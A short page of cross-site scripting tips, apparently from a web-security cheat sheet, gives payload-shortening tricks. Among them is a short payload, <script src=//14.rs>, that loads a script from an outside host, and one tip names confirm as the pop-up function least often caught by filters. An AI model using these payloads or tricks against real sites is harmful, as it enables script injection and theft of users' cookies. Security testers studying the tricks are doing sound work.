XSS Tips
Tips & Tricks
http(s)://
can be shortened to//
or/\\
or\\
.document.cookie
can be shortened tocookie
. It applies to other DOM objects as well.alert and other pop-up functions don't need a value, so stop doing
alert('XSS')
and start doingalert()
You can use
//
to close a tag instead of>
.I have found that
confirm
is the least detected pop-up function so stop usingalert
.Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use
<script src=//14.rs>
instead of<script src="//14.rs">
The shortest HTML context XSS payload is
<script src=//14.rs>
(19 chars)
Awesome Encoding
Last updated